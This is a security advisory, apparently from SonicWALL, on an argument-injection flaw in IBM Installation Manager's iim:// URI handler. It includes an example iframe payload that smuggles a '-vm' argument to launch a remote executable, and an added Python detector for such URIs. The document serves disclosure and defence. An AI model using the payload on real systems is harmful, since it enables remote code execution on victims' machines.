IBM Installation Manager Code Execution (Oct 2, 2009)

IBM Installation Manager (IIM) is a software tool that helps to install, update, modify, and uninstall packages. Additionally, IIM helps to keep track of what has been installed, determine what is available for installation, and organize installation directories. IIM runs on Windows and Linux platforms.

IIM provides a set of installation wizards to manage packages. When IIM is installed, it registers the application “IBMIM.exe” as the iim:// scheme handler. The format for the scheme is listed below:

iim://URI

The aforementioned URI will be executed in the following command:

IBMIM.exe -url "URI"

IBMIM.exe accepts many command-line arguments, such as -ignoreRepositoryDigest, -accessRights and so on. The following example shows a command that executes with multiple arguments:

IBMIM.exe -vm EXECUTABLE.EXE -url "www.google.com"

The above command can be invoked by the following HTML page:

< iframe src='iim://"%20-vm%20\x.x.x.xEXECUTABLE.EXE%20-url%20www.google.com"' >

There is an argument injection vulnerability in IBM Installation Manager. From the above example, we can see that a malicious executable file can be supplied as one of the IBMIM.exe arguments through the iim:// scheme. A web browser may fail to sanitize the IIM URI before passing it to the registered application. An attacker exploiting this vulnerability can remotely control the arguments passed to the IIM executable, and inject and execute malicious programs.
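As an added example (not part of the original advisory and not SonicWALL's signature logic), the following Python sketch shows how a content filter could flag iim: URIs in HTML whose decoded form breaks out of the quoted -url argument. The function names, the placeholder file name and the sample page are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# A double quote closes the -url "..." argument; whitespace followed by a
# switch (for example -vm) starts a new argument on the IBMIM.exe command line.
BREAKOUT = re.compile(r'"|\s-[A-Za-z]')


class IimAttrCollector(HTMLParser):
    """Collect every attribute value that is an iim: URI."""

    def __init__(self):
        super().__init__()
        self.uris = []

    def handle_starttag(self, tag, attrs):
        for _name, value in attrs:
            if value and value.strip().lower().startswith("iim:"):
                self.uris.append(value.strip())


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are also seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_suspicious_iim_uris(html):
    """Return iim: URIs whose decoded form could inject extra arguments."""
    collector = IimAttrCollector()
    collector.feed(html)
    collector.close()
    return [u for u in collector.uris if BREAKOUT.search(decode_fully(u[4:]))]


# Constructed sample page: one plain link and two argument-injection shapes.
SAMPLE_PAGE = """
<a href="iim://repository.example.com/packages">install</a>
<iframe src='iim://"%20-vm%20PLACEHOLDER.EXE%20-url%20example.com"'></iframe>
<iframe src="iim://%2522%2520-vm%2520PLACEHOLDER.EXE"></iframe>
"""

if __name__ == "__main__":
    for uri in find_suspicious_iim_uris(SAMPLE_PAGE):
        print("suspicious:", uri)
```

The same breakout test can be applied on the handler side to reject a URI before it is placed on a command line.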

SonicWALL has released an IPS signature to detect and block generic attack attempts targeting this vulnerability. The following signature has been released:

  • 2064 IBM Installation Manager iim URI Handling Code Execution Attempt

This vulnerability has not been assigned a Common Vulnerabilities and Exposures (CVE) identifier.
